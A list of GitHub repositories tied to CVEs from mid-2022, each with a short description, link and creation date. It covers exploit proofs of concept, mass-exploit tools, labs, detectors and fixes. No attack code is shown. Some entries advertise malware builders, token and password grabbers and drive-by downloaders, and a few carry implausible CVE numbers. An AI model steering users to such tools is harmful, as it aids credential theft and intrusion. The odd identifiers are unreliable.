**An eBPF detection program for CVE-2022-0847** : [airbus-cert/dirtypipe-ebpf_detection](https://github.com/airbus-cert/dirtypipe-ebpf_detection) create time: 2022-07-05T07:20:59Z

**no description** : [nidhi7598/frameworks_base_AOSP10_r33_CVE-2022-20135-](https://github.com/nidhi7598/frameworks_base_AOSP10_r33_CVE-2022-20135-) create time: 2022-07-05T10:15:49Z

**no description** : [nidhi7598/Frameworks_base_AOSP10_r33__CVE-2022-20124-](https://github.com/nidhi7598/Frameworks_base_AOSP10_r33__CVE-2022-20124-) create time: 2022-07-05T08:59:44Z

**CVE-2022-29464 Exploit** : [Pasch0/WSO2RCE](https://github.com/Pasch0/WSO2RCE) create time: 2022-07-05T08:27:04Z

**no description** : [Debajyoti0-0/CVE-2022-26134](https://github.com/Debajyoti0-0/CVE-2022-26134) create time: 2022-07-05T07:04:50Z

**Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)** : [nxtexploit/CVE-2022-26134](https://github.com/nxtexploit/CVE-2022-26134) create time: 2022-07-05T04:30:42Z

**TOTOLINK-A702R-V1.0.0-B20161227.1023 Directory Indexing Vulnerability** : [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368) create time: 2022-07-05T03:14:52Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability** : [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733) create time: 2022-07-05T03:13:42Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session** : [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732) create time: 2022-07-05T03:11:54Z

**EXP for Spring4Shell(CVE-2022-22965)** : [D1mang/Spring4Shell-CVE-2022-22965](https://github.com/D1mang/Spring4Shell-CVE-2022-22965) create time: 2022-07-05T03:03:31Z

**no description** : [TheL1ghtVn/CVE-2022-30333-PoC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC) create time: 2022-07-05T02:35:12Z

**no description** : [trhacknon/CVE-2022-22965](https://github.com/trhacknon/CVE-2022-22965) create time: 2022-07-05T02:30:29Z

**no description** : [MuallimNaci/CVE-2022-30887](https://github.com/MuallimNaci/CVE-2022-30887) create time: 2022-07-04T19:24:56Z

**Atlassian, CVE-2022-26134 An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vulnerability.** : [r1skkam/TryHackMe-Atlassian-CVE-2022-26134](https://github.com/r1skkam/TryHackMe-Atlassian-CVE-2022-26134) create time: 2022-07-04T15:00:21Z

**Fuzzing, visualization and exploit of sudo vulnerability CVE-2021-3156** : [FrancescoMarchiori/CVE-2021-3156](https://github.com/FrancescoMarchiori/CVE-2021-3156) create time: 2022-07-04T13:55:24Z

**Apache Solr RCE检测脚本 (CVE-2017-12629)** : [77Huan/-Wiki](https://github.com/77Huan/-Wiki) create time: 2022-07-04T13:14:36Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142) create time: 2022-07-04T12:16:05Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2022-30594](https://github.com/nidhi7598/linux-4.19.72_CVE-2022-30594) create time: 2022-07-04T10:01:05Z

**metasploit and python module for CVE-2022-26809 windows rpc rce via smb 445** : [Ziggy78/CVE-2022-26809-RCE](https://github.com/Ziggy78/CVE-2022-26809-RCE) create time: 2022-07-04T09:22:09Z

**CVE-2022-1388, bypassing iControl REST authentication** : [jbharucha05/CVE-2022-1388](https://github.com/jbharucha05/CVE-2022-1388) create time: 2022-07-04T06:31:56Z

**CVE-2022-30929 POC** : [AgainstTheLight/CVE-2022-30929](https://github.com/AgainstTheLight/CVE-2022-30929) create time: 2022-07-04T05:36:18Z

**no description** : [TonightRanger/cve-2018-9995](https://github.com/TonightRanger/cve-2018-9995) create time: 2022-07-04T05:07:57Z

**CVE-2022-24706 POC exploit** : [superzerosec/CVE-2022-24706](https://github.com/superzerosec/CVE-2022-24706) create time: 2022-07-04T02:06:27Z

**The above investigation of the ES file browser security weakness allows us to see the issue in its entirety** : [Osuni-99/CVE-2019-6447](https://github.com/Osuni-99/CVE-2019-6447) create time: 2022-07-03T05:57:14Z

**PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication** : [yuriisanin/CVE-2022-24342](https://github.com/yuriisanin/CVE-2022-24342) create time: 2022-07-02T22:04:29Z

**Ruby反序列化命令执行漏洞(CVE-2019-5420)-vulfocus通关版** : [laffray/ruby-RCE-CVE-2019-5420-](https://github.com/laffray/ruby-RCE-CVE-2019-5420-) create time: 2022-07-02T15:44:03Z

**no description** : [macilin/CVE-2021-21300](https://github.com/macilin/CVE-2021-21300) create time: 2022-07-02T12:19:21Z

**CVE-2022-2185 poc** : [safe3s/CVE-2022-2185-poc](https://github.com/safe3s/CVE-2022-2185-poc) create time: 2022-07-02T07:58:01Z

**Proof-of-concept for CVE-2022-26766 on macOS 12.3.1** : [zhuowei/CoreTrustDemo](https://github.com/zhuowei/CoreTrustDemo) create time: 2022-07-02T06:16:33Z

**PCIDriverKit proof-of-concept for CVE-2022-26763** : [zhuowei/PCICrash](https://github.com/zhuowei/PCICrash) create time: 2022-07-02T06:15:29Z

**PoC for exploiting CVE-2022-1388 on BIG IP F5** : [Luchoane/CVE-2022-1388_refresh](https://github.com/Luchoane/CVE-2022-1388_refresh) create time: 2022-07-01T18:08:50Z

**no description** : [Davi-afk/jenkins-cve-CVE-2017-2606](https://github.com/Davi-afk/jenkins-cve-CVE-2017-2606) create time: 2022-07-01T15:43:26Z

**CVE-2018-6574: go get RCE PentesterLab** : [Logan-Elliott/CVE-2018-6574-go-get-RCE](https://github.com/Logan-Elliott/CVE-2018-6574-go-get-RCE) create time: 2022-07-01T14:41:47Z

**ASUS router exploit** : [Expl0desploit/CVE-2021-44158](https://github.com/Expl0desploit/CVE-2021-44158) create time: 2022-07-01T14:54:42Z

**no description** : [Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130](https://github.com/Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130) create time: 2022-07-01T13:16:14Z

**Apache Tomcat DoS (CVE-2022-29885) Exploit** : [iveresk/CVE-2022-29885](https://github.com/iveresk/CVE-2022-29885) create time: 2022-07-01T09:02:10Z

**Features: -Include silent doc exploit -Several exploits, most are sendable via GMail -Compatible with every rat/keylogger/worm -Compatible with Windows XP - Windows 10 32/64 -FUD (DOC CHM) -Works with every MS Office from 2007 to 2016 (excluding Starter edition - there's no macro support) -Startup -base64 encode** : [notSMods/Hta-Exploit-Downloader-Malware-Builder](https://github.com/notSMods/Hta-Exploit-Downloader-Malware-Builder) create time: 2022-06-30T19:56:40Z

**no description** : [notSMods/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/notSMods/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-06-30T20:06:10Z

**no description** : [notSMods/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/notSMods/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-06-30T19:57:00Z

**no description** : [notSMods/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/notSMods/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-06-30T19:56:11Z

**no description** : [Asbatel/CBDS_CVE-2022-0847_POC](https://github.com/Asbatel/CBDS_CVE-2022-0847_POC) create time: 2022-06-30T13:07:55Z

**Apache Tomcat DoS (CVE-2022-29885) Exploit** : [4ra1n/CVE-2022-29885](https://github.com/4ra1n/CVE-2022-29885) create time: 2022-04-30T02:30:00Z

**Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)** : [cheshireca7/CVE-2022-28117](https://github.com/cheshireca7/CVE-2022-28117) create time: 2022-04-06T13:27:48Z

**no description** : [vesperp/CVE-2021-42237-SiteCore-XP](https://github.com/vesperp/CVE-2021-42237-SiteCore-XP) create time: 2022-06-30T10:44:23Z

**GitLab-Graphql-CVE-2020-26413 POC** : [Kento-Sec/GitLab-Graphql-CVE-2020-26413](https://github.com/Kento-Sec/GitLab-Graphql-CVE-2020-26413) create time: 2022-06-30T06:29:28Z

**GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413 POC** : [Kento-Sec/GitLab-Graphql-CVE-2020-26413](https://github.com/Kento-Sec/GitLab-Graphql-CVE-2020-26413) create time: 2022-06-30T06:28:27Z

**0.6.18 - 1.20.0 Nginx Memory Overwrite Vulnerability PoC** : [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC) create time: 2022-06-30T04:39:58Z

**REST API for CVE from years '99-2022** : [Vicariss/cve-rest](https://github.com/Vicariss/cve-rest) create time: 2022-06-23T17:23:10Z

**PoC for exploiting CVE-2022-26134 on Confluence** : [Luchoane/CVE-2022-26134_conFLU](https://github.com/Luchoane/CVE-2022-26134_conFLU) create time: 2022-06-29T17:33:18Z

**CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation** : [huangyutange0uywlcn/HyperSine](https://github.com/huangyutange0uywlcn/HyperSine) create time: 2022-06-29T15:33:05Z

**PoC for ManageEngine ADAudit Plus CVE-2022-28219** : [horizon3ai/CVE-2022-28219](https://github.com/horizon3ai/CVE-2022-28219) create time: 2022-06-26T15:48:27Z

**CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability** : [kh4sh3i/ProxyShell](https://github.com/kh4sh3i/ProxyShell) create time: 2022-06-29T12:37:31Z

**A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.** : [flux10n/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/flux10n/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-06-29T12:02:13Z

**CVE-2022-30190 powerpoint version** : [Gra3s/CVE-2022-30190-Follina-PowerPoint-Version](https://github.com/Gra3s/CVE-2022-30190-Follina-PowerPoint-Version) create time: 2022-06-29T08:48:12Z

**$$$$$$$$$$$$$$$** : [Vbedtt54e5/interesting-release-of-CVE-2022-63432](https://github.com/Vbedtt54e5/interesting-release-of-CVE-2022-63432) create time: 2022-06-29T08:28:18Z

**no description** : [trhacknon/CVE-2021-25003](https://github.com/trhacknon/CVE-2021-25003) create time: 2022-06-29T06:51:36Z

**[CVE-2022-22980] Spring Data MongoDB SpEL Expression injection** : [murataydemir/CVE-2022-22980](https://github.com/murataydemir/CVE-2022-22980) create time: 2022-06-28T21:42:35Z

**Apache Shiro CVE-2022-32532** : [4ra1n/CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) create time: 2022-06-28T22:38:30Z

**🕵️ CVE-2019-9670 Exploit | XXE in Zimbra Collaboration 8.7.X < 8.7.11p10** : [oppsec/arbimz](https://github.com/oppsec/arbimz) create time: 2022-06-28T20:01:11Z

**no description** : [FedericoHeichou/CVE-2022-32988](https://github.com/FedericoHeichou/CVE-2022-32988) create time: 2022-06-05T17:56:29Z

**Old exploit for Issue 1076708** : [kiks7/CVE-2020-6468-Chrome-Exploit](https://github.com/kiks7/CVE-2020-6468-Chrome-Exploit) create time: 2022-06-28T16:58:51Z

**no description** : [NBAquicknut/CVE-2018-6574](https://github.com/NBAquicknut/CVE-2018-6574) create time: 2022-06-28T16:36:05Z

**Dirty Cow exploit - CVE-2016-5195** : [flux10n/dirtycow](https://github.com/flux10n/dirtycow) create time: 2022-06-28T10:08:43Z

**工控安全,溯源** : [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475) create time: 2022-06-28T09:00:55Z

**红队,蓝队,免杀** : [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561) create time: 2022-06-28T09:00:26Z

**ARMember < 3.4.8 - Unauthenticated Admin Account Takeover** : [biulove0x/CVE-2022-1903](https://github.com/biulove0x/CVE-2022-1903) create time: 2022-06-28T08:39:12Z

**攻击,免杀** : [huihuo123/CVE-2022-5555](https://github.com/huihuo123/CVE-2022-5555) create time: 2022-06-28T07:42:17Z

**An exploitable pool corruption vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause a buffer overflow, resulting in kernel memory corruption and, potentially, privilege escalation. An attacker can send an IRP request to trigger this vulnerability.** : [Exploitables/CVE-2018-3990-TALOS-2018-0658](https://github.com/Exploitables/CVE-2018-3990-TALOS-2018-0658) create time: 2022-06-28T03:48:09Z

**A docker container vulnerable to Shellshock - CVE-2014-6271** : [anujbhan/shellshock-victim-host](https://github.com/anujbhan/shellshock-victim-host) create time: 2022-06-27T21:52:28Z

**Test CVE-2018-6574** : [Bernasv/CVE-2018-6574](https://github.com/Bernasv/CVE-2018-6574) create time: 2022-06-27T21:21:49Z

**免杀,攻击,钓鱼,蓝队,木马** : [huihuo123/CVE2022-0111-](https://github.com/huihuo123/CVE2022-0111-) create time: 2022-06-27T15:39:52Z

**免杀,木马,攻击,防守** : [huihuo123/CVE20222-](https://github.com/huihuo123/CVE20222-) create time: 2022-06-27T15:19:20Z

**no description** : [huihuo123/cve2022-0001-](https://github.com/huihuo123/cve2022-0001-) create time: 2022-06-27T14:46:20Z

**ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell)** : [kh4sh3i/ProxyLogon](https://github.com/kh4sh3i/ProxyLogon) create time: 2022-06-27T08:07:48Z

**CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System** : [oturu/CVE-2022-30136-POC](https://github.com/oturu/CVE-2022-30136-POC) create time: 2022-06-26T20:54:02Z

**Python exploit for CVE-2021-38314** : [c0ff33b34n/CVE-2021-38314](https://github.com/c0ff33b34n/CVE-2021-38314) create time: 2022-06-26T17:23:40Z

**WPCargo < 6.9.0 - Unauthenticated RCE** : [biulove0x/CVE-2021-25003](https://github.com/biulove0x/CVE-2021-25003) create time: 2022-06-26T13:07:47Z

**no description** : [Viniciuspxf/CVE-2019-10742](https://github.com/Viniciuspxf/CVE-2019-10742) create time: 2022-06-26T01:14:56Z

**Active Directory scanner for MS17-010 MS14-068 CVE-2020-1472 etc...** : [hadhub/ad-scanner](https://github.com/hadhub/ad-scanner) create time: 2022-06-25T23:12:10Z

**Educational Follina PoC Tool** : [ethicalblue/Follina-CVE-2022-30190-PoC-sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-PoC-sample) create time: 2022-06-25T16:27:59Z

**Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.** : [tijme/kernel-mii](https://github.com/tijme/kernel-mii) create time: 2022-06-25T11:13:45Z

**CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System** : [oturu/Cve-2022-30136-RCE](https://github.com/oturu/Cve-2022-30136-RCE) create time: 2022-06-25T07:28:34Z

**WaterDragon:用GithubAction实现代理功能。红队,cve,代理池,隐匿,攻防,对抗,hackone,src,proxy,CVE-2020,CVE-2021,CVE-2022** : [sh3d0ww01f/WaterDragon](https://github.com/sh3d0ww01f/WaterDragon) create time: 2022-06-20T15:38:53Z

**no description** : [zeroc00I/CVE-2022-34305](https://github.com/zeroc00I/CVE-2022-34305) create time: 2022-06-25T05:49:55Z

**Nacos下Spring-Cloud-Gateway CVE-2022-22947利用** : [B0rn2d/Spring-Cloud-Gateway-Nacos](https://github.com/B0rn2d/Spring-Cloud-Gateway-Nacos) create time: 2022-06-25T05:02:06Z

**CVE-2021-26855** : [TheDudeD6/ExchangeSmash](https://github.com/TheDudeD6/ExchangeSmash) create time: 2022-06-24T17:42:28Z

**no description** : [cyb3rpeace/CVE-2021-34527](https://github.com/cyb3rpeace/CVE-2021-34527) create time: 2022-06-24T13:25:25Z

**CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)** : [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156) create time: 2022-06-24T11:50:40Z

**Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)** : [ColdFusionX/CVE-2022-26134](https://github.com/ColdFusionX/CVE-2022-26134) create time: 2022-06-24T10:33:13Z

**CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)** : [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156) create time: 2022-06-24T09:01:39Z

**Cisco ASA XSS CVE-2020-3580** : [cruxN3T/CVE-2020-3580](https://github.com/cruxN3T/CVE-2020-3580) create time: 2022-06-24T02:16:05Z

**Mass-Exploit-CVE-2022-1388** : [electr0lulz/Mass-CVE-2022-1388](https://github.com/electr0lulz/Mass-CVE-2022-1388) create time: 2022-06-24T00:58:37Z

**Tested in HackTheBox - Shocker (Easy) CVE-2014-6271** : [Gurguii/shellshock.sh](https://github.com/Gurguii/shellshock.sh) create time: 2022-06-23T19:42:03Z

**Admin account registration in Online Student Rate System** : [StefanDorresteijn/CVE-2021-39409](https://github.com/StefanDorresteijn/CVE-2021-39409) create time: 2021-08-17T16:48:53Z

**XSS vulnerability in Online Student Rate System1.0** : [StefanDorresteijn/CVE-2021-39408](https://github.com/StefanDorresteijn/CVE-2021-39408) create time: 2021-08-17T16:45:06Z

**no description** : [PenteraIO/CVE-2022-23222-POC](https://github.com/PenteraIO/CVE-2022-23222-POC) create time: 2022-06-22T14:01:50Z

**Exploit for zerologon cve-2020-1472** : [lele8/CVE-2020-1472](https://github.com/lele8/CVE-2020-1472) create time: 2022-06-23T07:18:17Z

**Mass Exploit for CVE 2022-29464 on Carbon** : [electr0lulz/Mass-exploit-CVE-2022-29464](https://github.com/electr0lulz/Mass-exploit-CVE-2022-29464) create time: 2022-06-22T20:58:33Z

**CVE-2022-9673** : [CVE-2099-2222/CVE-2022-9673](https://github.com/CVE-2099-2222/CVE-2022-9673) create time: 2022-06-22T10:09:42Z

**CVE-2022-22980 漏洞靶场(扫描器可使用)** : [jweny/cve-2022-22980-exp](https://github.com/jweny/cve-2022-22980-exp) create time: 2022-06-22T07:51:22Z

**CVE-2022-22980环境** : [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo) create time: 2022-06-22T07:39:42Z

**IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting** : [trhacknon/CVE-2020-8512](https://github.com/trhacknon/CVE-2020-8512) create time: 2022-06-22T07:10:53Z

**Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980) Demo环境** : [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo) create time: 2022-06-22T06:27:43Z

**(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.** : [Exploitables/CVE-2015-2291](https://github.com/Exploitables/CVE-2015-2291) create time: 2022-06-22T05:22:57Z

**no description** : [trhacknon/CVE-2020-17519](https://github.com/trhacknon/CVE-2020-17519) create time: 2022-06-22T03:53:52Z

**CVE-2022-111111测试** : [thelostworldFree/CVE-2022-111111](https://github.com/thelostworldFree/CVE-2022-111111) create time: 2022-06-21T13:35:55Z

**CVE-2022-22980环境** : [kuron3k0/Spring-Data-Mongodb-Example](https://github.com/kuron3k0/Spring-Data-Mongodb-Example) create time: 2022-06-21T12:02:00Z

**[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)** : [kh4sh3i/CVE-2022-26134](https://github.com/kh4sh3i/CVE-2022-26134) create time: 2022-06-21T11:49:48Z

**Poc of CVE-2022-22980** : [trganda/CVE-2022-22980](https://github.com/trganda/CVE-2022-22980) create time: 2022-06-21T11:39:13Z

**no description** : [delicateByte/CVE-2019-19945_Test](https://github.com/delicateByte/CVE-2019-19945_Test) create time: 2022-06-21T09:07:10Z

**cve-2021-22005vcenter任意文件上传漏洞,可直接上传冰蝎** : [InventorMAO/cve-2021-22005](https://github.com/InventorMAO/cve-2021-22005) create time: 2022-06-21T07:36:01Z

**Windows Network File System Crash PoC** : [i6c/CVE-2022-26937](https://github.com/i6c/CVE-2022-26937) create time: 2022-06-21T00:12:32Z

**[CVE-2018-4084]** : [dybrkr/wifi_leak](https://github.com/dybrkr/wifi_leak) create time: 2022-06-20T21:10:22Z

**Telesquare SDT-CW3B1 1.1.0 - OS Command Injection** : [Chocapikk/CVE-2021-46422](https://github.com/Chocapikk/CVE-2021-46422) create time: 2022-06-20T19:24:55Z

**Golang implementation of CVE-2019-17662 TinyVNC Arbitrary File Read leading to Authentication Bypass Exploit** : [Tamagaft/CVE-2019-17662](https://github.com/Tamagaft/CVE-2019-17662) create time: 2022-06-19T16:33:04Z

**CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint** : [Chocapikk/CVE-2022-1388](https://github.com/Chocapikk/CVE-2022-1388) create time: 2022-06-20T01:58:40Z

**burpsuite 的Spring漏洞扫描插件。SpringVulScan:支持检测:路由泄露|CVE-2022-22965|CVE-2022-22963|CVE-2022-22947|CVE-2016-4977** : [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan) create time: 2022-06-19T13:16:55Z

**「💥」CVE-2022-26134 - Confluence Pre-Auth RCE** : [AmoloHT/CVE-2022-26134](https://github.com/AmoloHT/CVE-2022-26134) create time: 2022-06-19T13:50:22Z

**CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System** : [zir0x00/CVE-2022-30136-MASS-RCE](https://github.com/zir0x00/CVE-2022-30136-MASS-RCE) create time: 2022-06-19T12:13:41Z

**MSDT 0-Day Mass Exploitation Tool** : [zir0x00/CVE-2022-30190-MASS-RCE](https://github.com/zir0x00/CVE-2022-30190-MASS-RCE) create time: 2022-06-19T12:10:10Z

**CVE-2021-40903** : [vulnz/CVE-2021-40903](https://github.com/vulnz/CVE-2021-40903) create time: 2022-06-19T09:01:24Z

**no description** : [PyterSmithDarkGhost/0DAYIPHONE13IOS15.2CVE-2022-22588](https://github.com/PyterSmithDarkGhost/0DAYIPHONE13IOS15.2CVE-2022-22588) create time: 2022-06-19T04:24:54Z

**no description** : [wlensinas/CVE-2002-1614](https://github.com/wlensinas/CVE-2002-1614) create time: 2022-06-18T18:43:35Z

**no description** : [PyterSmithDarkGhost/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection-main](https://github.com/PyterSmithDarkGhost/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection-main) create time: 2022-06-18T14:42:04Z

**PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.** : [s1ckb017/PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809) create time: 2022-06-13T11:08:33Z

**Research project which I have started working on during my internship conducted at LIF, between April and June 2022. Our goal is to establish a machine learning model, which can predict efficiently if a CVE will be exploited in the wild or not.** : [rayan776/LIF_predict_cve_exploited](https://github.com/rayan776/LIF_predict_cve_exploited) create time: 2022-06-18T08:59:05Z

**no description** : [xCodeBossS/CodeBoss-CVE-2022](https://github.com/xCodeBossS/CodeBoss-CVE-2022) create time: 2022-06-18T01:53:37Z

**metasploit module for CVE-2022-26809 windows rpc rce via smb 445** : [Ziggy78/CVE-2022-26809-POC](https://github.com/Ziggy78/CVE-2022-26809-POC) create time: 2022-06-17T20:47:07Z

**no description** : [InitRoot/CVE-2022-23342](https://github.com/InitRoot/CVE-2022-23342) create time: 2022-06-17T19:46:45Z

**CVE-2021-43229 Walkthrough** : [Citizen13X/CVE-2021-43229](https://github.com/Citizen13X/CVE-2021-43229) create time: 2022-06-07T13:32:17Z

**A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.** : [pwn3z/CVE-2021-41773-Apache-RCE](https://github.com/pwn3z/CVE-2021-41773-Apache-RCE) create time: 2022-06-17T13:36:42Z

**unauthorized RcE exploit for webnin < 1.920** : [psw01/CVE-2019-15107_webminRCE](https://github.com/psw01/CVE-2019-15107_webminRCE) create time: 2022-06-17T12:04:38Z

**Integer overflow in KmxSbx.sys 6.2.0.22 in CA Internet Security Suite Plus 2010 allows local users to cause a denial of service (pool corruption) and execute arbitrary code via crafted arguments to the 0x88000080 IOCTL, which triggers a buffer overflow.** : [Exploitables/CVE-2010-4502](https://github.com/Exploitables/CVE-2010-4502) create time: 2022-06-17T02:39:13Z

**Windows Network File System Crash PoC** : [omair2084/CVE-2022-26937](https://github.com/omair2084/CVE-2022-26937) create time: 2022-06-17T01:42:55Z

**URL Infection (Silent Java Drive By) URL Infection Exploit Silent Java Drive by downloads may happen when visiting a site, opening an e-mail message. It may even happen by clicking on a malicious pop-up window: by clicking on the window in the belief that it concerns an error report from the computer’s OS, for example.** : [Dexie619/Slient-Url-Exploit-New-Cve-Chrome-Exploit-Html-Downloader-Put-Your-Link](https://github.com/Dexie619/Slient-Url-Exploit-New-Cve-Chrome-Exploit-Html-Downloader-Put-Your-Link) create time: 2022-06-16T19:45:02Z

**CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System** : [oturu/Cve-2022-30136-RCE](https://github.com/oturu/Cve-2022-30136-RCE) create time: 2022-06-16T21:16:53Z

**no description** : [34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-06-16T19:52:25Z

**no description** : [34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-06-16T19:43:58Z

**no description** : [34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-06-16T19:43:00Z

**CVE-2022-26757 discovered by @nedwill** : [Dylbin/flow_divert](https://github.com/Dylbin/flow_divert) create time: 2022-06-16T14:58:25Z

**关于漂亮鼠的那些精彩事迹(变态的油腻大叔)CVE-2022-6969、CVE-2022-0001** : [piaoliangshu/piaoliangshusb](https://github.com/piaoliangshu/piaoliangshusb) create time: 2022-06-16T11:58:36Z

**A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor** : [FlaviuPopescu/CVE-2022-28986](https://github.com/FlaviuPopescu/CVE-2022-28986) create time: 2022-06-16T08:52:28Z

**RCE from phpunit 5.6.2** : [Invertebr4do/cve-2017-9841](https://github.com/Invertebr4do/cve-2017-9841) create time: 2022-06-16T06:22:03Z

**no description** : [0xF331-D3AD/CVE-2012-2982](https://github.com/0xF331-D3AD/CVE-2012-2982) create time: 2022-06-16T01:59:28Z

**follina zero day vulnerability to help Microsoft to mitigate the attack** : [Cerebrovinny/follina-CVE-2022-30190](https://github.com/Cerebrovinny/follina-CVE-2022-30190) create time: 2022-06-15T22:49:21Z

**Reflected XSS on /link.cgi/ in Latest Webmin (1.994)** : [bl4ckmenace/CVE-2022-30709](https://github.com/bl4ckmenace/CVE-2022-30709) create time: 2022-06-15T17:46:38Z

**no description** : [Haniwa0x01/CVE-2022-30023](https://github.com/Haniwa0x01/CVE-2022-30023) create time: 2022-06-15T16:10:49Z

**IOC List** : [bengisugun/CVE-2022-22972-](https://github.com/bengisugun/CVE-2022-22972-) create time: 2022-06-15T12:34:20Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004) create time: 2022-06-15T10:29:03Z

**These are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)** : [SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code) create time: 2022-06-12T11:48:22Z

**These are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)** : [SrCroqueta/CVE-2022-30190_Temporary_Fix](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix) create time: 2022-06-11T11:16:56Z

**no description** : [notherealhazard/follina-CVE-2022-30190](https://github.com/notherealhazard/follina-CVE-2022-30190) create time: 2022-06-15T09:13:05Z

**some work for exploits cve-2020-2555\2883\14645 to attack ,draw lessons from Weblogic_cmd** : [minhangxiaohui/Weblogic_Coherence_exploit](https://github.com/minhangxiaohui/Weblogic_Coherence_exploit) create time: 2022-06-15T08:28:52Z

**This repository is developed to understand CVE-2019-6447** : [VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer](https://github.com/VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer) create time: 2022-06-15T05:32:34Z

**no description** : [p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) create time: 2022-06-15T03:49:05Z

